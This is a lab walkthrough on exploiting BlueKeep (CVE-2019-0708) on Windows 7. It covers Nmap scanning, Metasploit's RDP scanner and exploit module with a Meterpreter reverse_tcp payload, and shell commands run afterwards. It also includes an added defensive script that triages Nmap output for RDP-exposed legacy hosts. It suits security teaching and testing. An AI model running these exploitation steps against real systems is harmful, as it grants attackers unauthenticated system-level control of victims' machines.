How to Exploit BlueKeep (CVE-2019-0708) on Windows 7
What is BlueKeep?
BlueKeep (CVE-2019-0708) is a critical vulnerability in certain Windows operating systems, disclosed in 2019. Below is a list of affected 32-bit and 64-bit Windows systems:
- Windows 7
- Windows 2000
- Windows Vista
- Windows XP
- Windows Server 2003
- Windows Server 2003 R2
- Windows Server 2008
- Windows Server 2008 R2
This vulnerability can be exploited to allow an attacker to gain access to and control of a target system, which will be demonstrated in this post.
BlueKeep exists due to a flaw in the Remote Desktop Protocol (RDP) on the systems listed above. The vulnerability does not require any authentication for attackers to execute code at the system level (the highest privilege). If this vulnerability exists on one machine within a network, other systems are also at risk. Since BlueKeep is “wormable”, it can propagate rapidly across networks, much like the WannaCry malware attacks of 2017.
Lab Setup
Any unpatched Windows system listed above with an open RDP port is a potential target for this attack. The Windows 7 machine used as the target in this lab has the following conditions, making it vulnerable:
- Unpatched 64-bit Windows 7
- RDP enabled
- Port 3389 opened
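From the defender's side, the same conditions can be used to triage a network scan. The following is an added example, not part of the original post: it parses Nmap grepable output (`-oG`, with `-O` for the OS guess) and flags hosts that have 3389/tcp open and report an OS family from the affected list above. The scan lines, host names and addresses are constructed sample data.

```python
import re
# Affected families from this post's list; longer names first so R2 matches before non-R2.
AFFECTED = ["Windows Server 2008 R2", "Windows Server 2003 R2",
            "Windows Server 2008", "Windows Server 2003", "Windows 2000",
            "Windows Vista", "Windows XP", "Windows 7"]
RDP_PORT = 3389

# Constructed sample of `nmap -O -oG` output (documentation addresses).
SAMPLE_SCAN = """\
Host: 192.0.2.10 (win7-lab)\tPorts: 135/open/tcp//msrpc///, 3389/open/tcp//ms-wbt-server///\tOS: Microsoft Windows 7 SP1
Host: 192.0.2.11 (fileserver)\tPorts: 445/open/tcp//microsoft-ds///, 3389/filtered/tcp//ms-wbt-server///\tOS: Microsoft Windows Server 2008 R2
Host: 192.0.2.12 (jump01)\tPorts: 3389/open/tcp//ms-wbt-server///\tOS: Microsoft Windows Server 2016
Host: 192.0.2.13 ()\tStatus: Up
Host: 192.0.2.14 (legacy-app)\tPorts: 80/open/tcp//http///, 3389/open/tcp//ms-wbt-server///\tOS: Microsoft Windows Server 2008 R2 SP1
"""

def parse_host_line(line):
    """Split one grepable 'Host:' line into (ip, name, {port: state}, os_guess)."""
    fields = {}
    for part in line.strip().split("\t"):
        key, sep, value = part.partition(": ")
        if sep:
            fields[key] = value
    m = re.match(r"(\S+) \((.*)\)$", fields.get("Host", ""))
    if not m:
        return None
    ports = {}
    for entry in fields.get("Ports", "").split(","):
        bits = entry.strip().split("/")  # port/state/protocol/owner/service/...
        if len(bits) >= 2 and bits[0].isdigit():
            ports[int(bits[0])] = bits[1]
    return m.group(1), m.group(2), ports, fields.get("OS", "")

def triage(scan_text):
    """Return hosts with 3389/tcp open, affected OS families first."""
    findings = []
    for line in scan_text.splitlines():
        parsed = parse_host_line(line) if line.startswith("Host:") else None
        if parsed is None or parsed[2].get(RDP_PORT) != "open":
            continue
        ip, name, _, os_guess = parsed
        family = next((f for f in AFFECTED if f in os_guess), None)
        # A scan cannot see patch level, so a match means "verify", not "vulnerable".
        findings.append((ip, name, family, "CHECK PATCH LEVEL" if family else "rdp-exposed"))
    return sorted(findings, key=lambda f: f[2] is None)

if __name__ == "__main__":
    for ip, name, family, status in triage(SAMPLE_SCAN):
        print(f"{ip:<12} {name or '-':<11} {family or 'other OS':<23} {status}")
```

Hosts where 3389 is filtered or absent are skipped, and the OS field is only Nmap's guess, so each flagged host still needs its patch level confirmed on the machine itself.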
Scanning with Nmap
The image below shows the Nmap scan results for the Windows 7 machine:

Vulnerability Detection with Metasploit
Searching for BlueKeep in the Metasploit Framework reveals both an exploit module and an auxiliary scanner. Since port 3389 (RDP) is open, we’ll first use the auxiliary scanner to check if the system is vulnerable.

Running the RDP scanner provides details like the vulnerability description and the method it uses to check for BlueKeep.

After setting the target host and running the scan, the results confirm that the Windows 7 system is vulnerable.

Exploiting BlueKeep
Selecting the BlueKeep exploit module displays additional information, similar to the RDP scanner module:

The following payload is configured in Metasploit:
set payload windows/x64/meterpreter/reverse_tcp

This exploit is designed for 64-bit Windows systems only.
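Important: This particular exploit does not work against 32-bit Windows machines or 32-bit Windows Server 2008. That is a limit of the exploit, not of the vulnerability, which affects both 32-bit and 64-bit systems as listed above.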
Gaining a Shell
After running the exploit, we successfully obtain a Meterpreter shell on the Windows 7 target machine. From here, we can run system commands such as:
sysinfo
getuid


And with that – we’ve successfully exploited the system!
That wraps up this post. See you in the next one!